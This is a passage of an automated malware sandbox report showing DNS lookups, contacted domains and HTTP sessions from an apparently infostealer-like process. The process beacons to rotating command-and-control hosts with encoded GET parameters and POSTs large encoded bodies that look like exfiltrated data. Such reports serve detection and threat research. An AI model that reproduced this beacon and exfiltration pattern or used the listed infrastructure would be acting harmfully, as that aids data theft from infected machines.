                                                                  Dec 4, 2024 12:50:22.467202902 CET1.1.1.1192.168.2.40x9855No error (0)www.soainsaat.xyzredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                                  Dec 4, 2024 12:50:22.467202902 CET1.1.1.1192.168.2.40x9855No error (0)redirect.natrocdn.comnatroredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                                  Dec 4, 2024 12:50:22.467202902 CET1.1.1.1192.168.2.40x9855No error (0)natroredirect.natrocdn.com85.159.66.93A (IP address)IN (0x0001)false
                                                                  Dec 4, 2024 12:50:37.445986986 CET1.1.1.1192.168.2.40xc924No error (0)www.amayavp.xyz185.27.134.144A (IP address)IN (0x0001)false
                                                                  Dec 4, 2024 12:50:52.387238979 CET1.1.1.1192.168.2.40xbfbcNo error (0)www.vayui.top104.21.95.160A (IP address)IN (0x0001)false
                                                                  Dec 4, 2024 12:50:52.387238979 CET1.1.1.1192.168.2.40xbfbcNo error (0)www.vayui.top172.67.145.234A (IP address)IN (0x0001)false
                                                                  Dec 4, 2024 12:51:07.634727001 CET1.1.1.1192.168.2.40x6461No error (0)www.rgenerousrs.store104.21.57.248A (IP address)IN (0x0001)false
                                                                  Dec 4, 2024 12:51:07.634727001 CET1.1.1.1192.168.2.40x6461No error (0)www.rgenerousrs.store172.67.167.146A (IP address)IN (0x0001)false
                                                                  Dec 4, 2024 12:51:22.885624886 CET1.1.1.1192.168.2.40x2949No error (0)www.t91rl7.pro154.88.22.101A (IP address)IN (0x0001)false
                                                                  Dec 4, 2024 12:51:38.033061981 CET1.1.1.1192.168.2.40x34eeNo error (0)www.learnwithus.site209.74.77.107A (IP address)IN (0x0001)false
                                                                  Dec 4, 2024 12:51:56.748222113 CET1.1.1.1192.168.2.40x559eServer failure (2)www.cuthethoi.onlinenonenoneA (IP address)IN (0x0001)false
                                                                  Dec 4, 2024 12:51:56.748239994 CET1.1.1.1192.168.2.40x559eServer failure (2)www.cuthethoi.onlinenonenoneA (IP address)IN (0x0001)false
                                                                  Dec 4, 2024 12:51:56.748253107 CET1.1.1.1192.168.2.40x559eServer failure (2)www.cuthethoi.onlinenonenoneA (IP address)IN (0x0001)false
                                                                  Dec 4, 2024 12:51:56.748420000 CET1.1.1.1192.168.2.40x559eServer failure (2)www.cuthethoi.onlinenonenoneA (IP address)IN (0x0001)false
                                                                  Dec 4, 2024 12:51:57.892654896 CET1.1.1.1192.168.2.40x1419Server failure (2)www.cuthethoi.onlinenonenoneA (IP address)IN (0x0001)false
                                                                  Dec 4, 2024 12:52:05.409758091 CET1.1.1.1192.168.2.40x7a80No error (0)www.rafconstrutora.online104.21.34.103A (IP address)IN (0x0001)false
                                                                  Dec 4, 2024 12:52:05.409758091 CET1.1.1.1192.168.2.40x7a80No error (0)www.rafconstrutora.online172.67.159.24A (IP address)IN (0x0001)false
                                                                  Dec 4, 2024 12:52:22.500828981 CET1.1.1.1192.168.2.40x5d8eNo error (0)www.7vh2wy.top20.2.249.7A (IP address)IN (0x0001)false
                                                                  Dec 4, 2024 12:52:22.500848055 CET1.1.1.1192.168.2.40x5d8eNo error (0)www.7vh2wy.top20.2.249.7A (IP address)IN (0x0001)false
                                                                  Dec 4, 2024 12:52:22.500941992 CET1.1.1.1192.168.2.40x5d8eNo error (0)www.7vh2wy.top20.2.249.7A (IP address)IN (0x0001)false
                                                                  Dec 4, 2024 12:52:37.783214092 CET1.1.1.1192.168.2.40xa0caNo error (0)www.duwixushx.xyz156.251.17.224A (IP address)IN (0x0001)false
                                                                  Dec 4, 2024 12:52:52.856460094 CET1.1.1.1192.168.2.40x8219No error (0)www.yvcp3.info47.254.140.255A (IP address)IN (0x0001)false

                                                                  HTTP Request Dependency Graph

                                                                  • www.nb-shenshi.buzz
                                                                  • www.laohub10.net
                                                                  • www.xcvbj.asia
                                                                  • www.soainsaat.xyz
                                                                  • www.amayavp.xyz
                                                                  • www.vayui.top
                                                                  • www.rgenerousrs.store
                                                                  • www.t91rl7.pro
                                                                  • www.learnwithus.site
                                                                  • www.rafconstrutora.online
                                                                  • www.7vh2wy.top
                                                                  • www.duwixushx.xyz
                                                                  • www.yvcp3.info

                                                                  HTTP Packets

                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  0192.168.2.449736161.97.168.245804348C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Dec 4, 2024 12:49:33.295788050 CET486OUTGET /xxr1/?BTPDLZX=CTzPrZCB9Fii6KjTMWJ2M/WncddfpG5VDwI2wO/wDVbWtCCaNtYNYtUcS5/lXeW122DeEWPiybvqXTX+KsM66jciILoGQdVc74SRxgXHJUi2AjDZRtSfQFA=&WnQdf=JhLPW HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Language: en-US
                                                                  Host: www.nb-shenshi.buzz
                                                                  Connection: close
                                                                  User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                  Dec 4, 2024 12:49:34.577518940 CET1236INHTTP/1.1 404 Not Found
                                                                  Server: nginx
                                                                  Date: Wed, 04 Dec 2024 11:49:34 GMT
                                                                  Content-Type: text/html; charset=utf-8
                                                                  Content-Length: 2966
                                                                  Connection: close
                                                                  Vary: Accept-Encoding
                                                                  ETag: "66cd104a-b96"
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 [TRUNCATED]
                                                                  Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;color: #5d5d5d;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial,"Noto Sans", sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol","Noto Color Emoji";text-shadow: 0px 1px 1px rgba(255, 255, 255, 0.75);text-align: center;}h1 {font-size: 2.45em;font-weight: 700;color: #5d5d5d;letter-spacing: -0.02em;margin-bottom: 30px;margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn;}.info {color: #5594cf;fill: #5594cf;}.error [TRUNCATED]
                                                                  Dec 4, 2024 12:49:34.577559948 CET1236INData Raw: 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 63 39 32 31 32 37 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 77 61 72 6e 69 6e 67 20 7b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 66 66 63 63 33 33 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 66 66 63 63 33 33 3b 0a 09 09
                                                                  Data Ascii: ;fill: #c92127;}.warning {color: #ffcc33;fill: #ffcc33;}.success {color: #5aba47;fill: #5aba47;}.icon-large {height: 132px;width: 132px;}.description-text {color: #707
                                                                  Dec 4, 2024 12:49:34.577574968 CET698INData Raw: 39 34 31 20 32 31 36 20 32 39 36 76 34 63 30 20 36 2e 36 32 37 20 35 2e 33 37 33 20 31 32 20 31 32 20 31 32 68 35 36 63 36 2e 36 32 37 20 30 20 31 32 2d 35 2e 33 37 33 20 31 32 2d 31 32 76 2d 31 2e 33 33 33 63 30 2d 32 38 2e 34 36 32 20 38 33 2e
                                                                  Data Ascii: 941 216 296v4c0 6.627 5.373 12 12 12h56c6.627 0 12-5.373 12-12v-1.333c0-28.462 83.186-29.647 83.186-106.667 0-58.002-60.165-102-116.531-102zM256 338c-25.365 0-46 20.635-46 46 0 25.364 20.635 46 46 46s46-20.636 46-46c0-25.365-20.635-46-46-46z"


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  1192.168.2.44973727.124.4.246804348C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Dec 4, 2024 12:49:50.794718981 CET751OUTPOST /sgdd/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US
                                                                  Host: www.laohub10.net
                                                                  Origin: http://www.laohub10.net
                                                                  Referer: http://www.laohub10.net/sgdd/
                                                                  Cache-Control: no-cache
                                                                  Content-Length: 204
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                  Data Raw: 42 54 50 44 4c 5a 58 3d 71 33 44 38 31 64 48 54 67 48 57 32 6a 59 73 72 6b 77 50 4a 52 64 37 46 6c 50 47 57 48 6e 59 4c 39 47 34 63 70 6d 52 67 66 50 38 6f 4f 32 44 6e 4f 65 5a 41 49 76 79 58 48 2b 62 71 35 46 30 39 4f 72 32 55 78 73 7a 59 59 46 4c 2b 6d 59 51 42 56 62 2b 34 42 68 2f 42 45 78 64 77 73 34 39 68 70 55 33 41 44 31 4a 2b 41 32 56 4b 41 33 39 76 53 76 2b 44 64 2b 67 6a 59 37 72 31 4a 64 71 32 4d 6e 5a 56 4a 69 59 77 69 4f 36 65 39 69 46 77 39 50 64 70 78 6b 76 61 69 2b 6f 73 4d 4f 77 4c 65 72 43 51 62 46 49 61 6a 76 6b 58 62 56 48 34 76 68 65 75 2b 47 44 4d 69 71 6d 67 64 31 69 59 41 77 3d 3d
                                                                  Data Ascii: BTPDLZX=q3D81dHTgHW2jYsrkwPJRd7FlPGWHnYL9G4cpmRgfP8oO2DnOeZAIvyXH+bq5F09Or2UxszYYFL+mYQBVb+4Bh/BExdws49hpU3AD1J+A2VKA39vSv+Dd+gjY7r1Jdq2MnZVJiYwiO6e9iFw9Pdpxkvai+osMOwLerCQbFIajvkXbVH4vheu+GDMiqmgd1iYAw==
                                                                  Dec 4, 2024 12:49:52.176594973 CET525INHTTP/1.1 200 OK
                                                                  Server: Apache
                                                                  Content-Type: text/html; charset=utf-8
                                                                  Accept-Ranges: bytes
                                                                  Cache-Control: max-age=86400
                                                                  Age: 1
                                                                  Connection: Close
                                                                  Content-Length: 350
                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 69 64 3d 22 78 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 78 2e 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2d 62 6a 2e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 2e 6e 65 74 2f 3f 68 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f [TRUNCATED]
                                                                  Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://cdn-bj.trafficmanager.net/?h="+window.location.host;if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  2192.168.2.44973827.124.4.246804348C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Dec 4, 2024 12:49:53.451234102 CET771OUTPOST /sgdd/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US
                                                                  Host: www.laohub10.net
                                                                  Origin: http://www.laohub10.net
                                                                  Referer: http://www.laohub10.net/sgdd/
                                                                  Cache-Control: no-cache
                                                                  Content-Length: 224
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                  Data Raw: 42 54 50 44 4c 5a 58 3d 71 33 44 38 31 64 48 54 67 48 57 32 69 37 30 72 69 54 33 4a 55 39 37 47 37 66 47 57 4f 48 59 50 39 47 30 63 70 6a 31 77 65 36 55 6f 50 53 48 6e 66 76 5a 41 4c 76 79 58 66 75 62 76 7a 6c 30 4d 4f 72 4b 6d 78 74 50 59 59 46 50 2b 6d 63 55 42 55 70 57 37 54 68 2f 44 4d 52 64 32 76 49 39 68 70 55 33 41 44 31 64 55 41 32 64 4b 41 6e 4e 76 53 4c 54 78 44 4f 67 67 52 62 72 31 65 4e 71 79 4d 6e 5a 6a 4a 6e 41 61 69 4d 43 65 39 67 4e 77 39 65 64 75 34 6b 75 52 6d 2b 70 62 43 4f 64 42 66 61 37 6a 51 6b 73 71 38 62 6b 52 58 7a 4b 69 2b 51 2f 35 73 47 6e 2f 2f 74 76 55 51 32 66 52 62 33 46 71 64 6c 41 46 69 79 31 73 47 45 78 36 53 47 74 2f 30 61 63 3d
                                                                  Data Ascii: BTPDLZX=q3D81dHTgHW2i70riT3JU97G7fGWOHYP9G0cpj1we6UoPSHnfvZALvyXfubvzl0MOrKmxtPYYFP+mcUBUpW7Th/DMRd2vI9hpU3AD1dUA2dKAnNvSLTxDOggRbr1eNqyMnZjJnAaiMCe9gNw9edu4kuRm+pbCOdBfa7jQksq8bkRXzKi+Q/5sGn//tvUQ2fRb3FqdlAFiy1sGEx6SGt/0ac=
                                                                  Dec 4, 2024 12:49:54.790479898 CET525INHTTP/1.1 200 OK
                                                                  Server: Apache
                                                                  Content-Type: text/html; charset=utf-8
                                                                  Accept-Ranges: bytes
                                                                  Cache-Control: max-age=86400
                                                                  Age: 1
                                                                  Connection: Close
                                                                  Content-Length: 350
                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 69 64 3d 22 78 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 78 2e 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2d 62 6a 2e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 2e 6e 65 74 2f 3f 68 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f [TRUNCATED]
                                                                  Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://cdn-bj.trafficmanager.net/?h="+window.location.host;if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  3192.168.2.44973927.124.4.246804348C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Dec 4, 2024 12:49:56.106270075 CET10853OUTPOST /sgdd/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US
                                                                  Host: www.laohub10.net
                                                                  Origin: http://www.laohub10.net
                                                                  Referer: http://www.laohub10.net/sgdd/
                                                                  Cache-Control: no-cache
                                                                  Content-Length: 10304
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                  Data Raw: 42 54 50 44 4c 5a 58 3d 71 33 44 38 31 64 48 54 67 48 57 32 69 37 30 72 69 54 33 4a 55 39 37 47 37 66 47 57 4f 48 59 50 39 47 30 63 70 6a 31 77 65 38 4d 6f 50 6e 54 6e 4e 38 78 41 4b 76 79 58 54 4f 62 75 7a 6c 30 52 4f 72 6a 74 78 74 43 6a 59 47 6e 2b 70 5a 41 42 54 59 57 37 4a 78 2f 44 54 68 64 7a 73 34 38 6a 70 56 61 4a 44 31 4e 55 41 32 64 4b 41 6b 56 76 62 2f 2f 78 42 4f 67 6a 59 37 72 35 4a 64 72 58 4d 6d 78 7a 4a 6d 51 67 6a 34 2b 65 2b 41 64 77 2b 73 31 75 33 6b 75 54 71 65 70 44 43 4f 52 43 66 61 6d 59 51 6b 59 54 38 63 55 52 48 6d 37 6e 6b 67 44 67 35 56 6e 63 67 61 66 5a 64 30 54 70 53 46 70 68 53 31 67 6a 34 7a 46 46 46 45 34 67 46 32 31 41 6c 73 7a 33 47 55 66 57 2b 76 4c 4f 76 73 4d 66 4e 2f 75 75 52 6a 61 6a 6e 77 6b 32 77 37 42 70 5a 48 48 36 33 71 4e 2b 49 66 6c 72 6d 4d 68 2f 6c 4b 47 68 6a 77 55 4c 63 34 37 38 35 52 6d 75 52 39 6c 41 6b 68 45 48 50 35 41 73 50 2b 36 47 36 56 65 7a 55 72 6b 49 2b 6a 43 55 43 6e 6e 73 44 45 74 42 30 6e 32 4c 66 7a 30 45 76 74 35 48 38 72 34 70 53 42 [TRUNCATED]
                                                                  Data Ascii: BTPDLZX=q3D81dHTgHW2i70riT3JU97G7fGWOHYP9G0cpj1we8MoPnTnN8xAKvyXTObuzl0ROrjtxtCjYGn+pZABTYW7Jx/DThdzs48jpVaJD1NUA2dKAkVvb//xBOgjY7r5JdrXMmxzJmQgj4+e+Adw+s1u3kuTqepDCORCfamYQkYT8cURHm7nkgDg5VncgafZd0TpSFphS1gj4zFFFE4gF21Alsz3GUfW+vLOvsMfN/uuRjajnwk2w7BpZHH63qN+IflrmMh/lKGhjwULc4785RmuR9lAkhEHP5AsP+6G6VezUrkI+jCUCnnsDEtB0n2Lfz0Evt5H8r4pSBJsrxAuCKzQHK9XyuRzmkKRlVIAFogzcdZ3L1RKOjnnBA8XEI592CoQYy2TluZfERYrEcO4rM5QQUKBQ893zzt7zhSPZ/8dwf7JoxKZq+tKM04fsVLx6xnwRafuHYP4+i0vQoAjj1MiOQfqU/2zPNUKoKY4Rc8JqhRZYVUo/EpFi41YtRT1z6Vpvhu5EIXjKnYBGk8QwpE3/44mi7tbd03uM9b2jdcvT2T0ttX4AMPr9NgVLZ9H1yMwVwwYMyUugxliSfJDzukPIU6pfauR9GV8xA2lVvOIhwKWwku6sc5zX1lTTRKfTfjXaWpm/dFhO3R1rkYSutDCVckzykAyl80+xDaB87vBL/G2I9nagStVFlHPSAzJokugX+cpe8QLRvJsxSsIlJrTkD0pf8H90TWNrxImfz+1mz51WBQSoD4P/+8zfwYOBIpMdEJqeTGjwwfOI7OG4jo2tHd+QGZQy6XSbSSghMjLbm66wFwnNGox89qvU1do9Rg9giEHbdNhq6wXopInwUTnZHT8kliVIdL9Yu14yMsDPTuRa+ue3ogIo3KxGAo/UIRXwmnJFD3qoRxK/YlYPsxQpX1yYglyU8NDXVdoPZ7jS+eZkUUngcZ3RQ2Wj4rE0if2JoV/MX4FaVa4cPiPXzyUZxv0MCvhmf4XleXcd6xoAiRA [TRUNCATED]
                                                                  Dec 4, 2024 12:49:57.449558020 CET525INHTTP/1.1 200 OK
                                                                  Server: Apache
                                                                  Content-Type: text/html; charset=utf-8
                                                                  Accept-Ranges: bytes
                                                                  Cache-Control: max-age=86400
                                                                  Age: 1
                                                                  Connection: Close
                                                                  Content-Length: 350
                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 69 64 3d 22 78 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 78 2e 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2d 62 6a 2e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 2e 6e 65 74 2f 3f 68 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f [TRUNCATED]
                                                                  Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://cdn-bj.trafficmanager.net/?h="+window.location.host;if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  4192.168.2.44974227.124.4.246804348C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Dec 4, 2024 12:49:58.757409096 CET483OUTGET /sgdd/?BTPDLZX=n1rc2pzYlnLUqZJl2DrPSNjVvvG+B3kr4Asv9klFc/49ZVn3If5xE9SNYfvTzAEQBq2X9buCd1WXrrlhdqeZSkv0BSFGr8wnshHLEWZTEWF2XmR1RoCWC90=&WnQdf=JhLPW HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Language: en-US
                                                                  Host: www.laohub10.net
                                                                  Connection: close
                                                                  User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                  Dec 4, 2024 12:50:00.105895996 CET525INHTTP/1.1 200 OK
                                                                  Server: Apache
                                                                  Content-Type: text/html; charset=utf-8
                                                                  Accept-Ranges: bytes
                                                                  Cache-Control: max-age=86400
                                                                  Age: 1
                                                                  Connection: Close
                                                                  Content-Length: 350
                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 69 64 3d 22 78 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 78 2e 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2d 62 6a 2e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 2e 6e 65 74 2f 3f 68 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f [TRUNCATED]
                                                                  Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://cdn-bj.trafficmanager.net/?h="+window.location.host;if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  5192.168.2.449763149.88.81.190804348C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Dec 4, 2024 12:50:06.831717968 CET745OUTPOST /rq1s/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
